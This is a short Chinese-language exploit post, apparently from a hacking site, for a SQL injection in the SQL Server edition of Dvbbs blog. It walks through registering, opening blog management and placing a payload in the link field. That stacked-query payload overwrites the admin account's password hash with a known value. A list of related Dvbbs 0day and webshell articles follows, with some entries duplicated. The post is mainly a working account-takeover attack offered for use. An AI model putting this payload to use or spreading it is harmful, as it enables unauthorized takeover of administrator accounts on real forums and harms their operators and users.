受影响版本:Dvbbs blog (All vers) SQL版
Access版不受影响
注册会员
进入管理博客
关健字设置
随便填
再编辑关健字
上面几个还是随便填写。。
在第三个,也就是连接地址这里写入语句
123123'where 1=0;update dv_user set userpassword='469e80d32c0559f8' where username='admin'--
只显示10条记录相关文章
动网PHP论坛indivgroup_dispbbs.php sql注入漏洞 (浏览: 9828, 评论: 0)
dvbbs php2.0 几处0day (浏览: 12717, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 12008, 评论: 0)
动网多个版本上传漏洞 (浏览: 16189, 评论: 0)
dvbbs 8.2前台0day (浏览: 17540, 评论: 0)
dvbbs php2.0 几处0day (浏览: 12717, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 12008, 评论: 0)
动网多个版本上传漏洞 (浏览: 16189, 评论: 0)
dvbbs 8.2前台0day (浏览: 17540, 评论: 0)
Trackbacks
 |
 |
 |
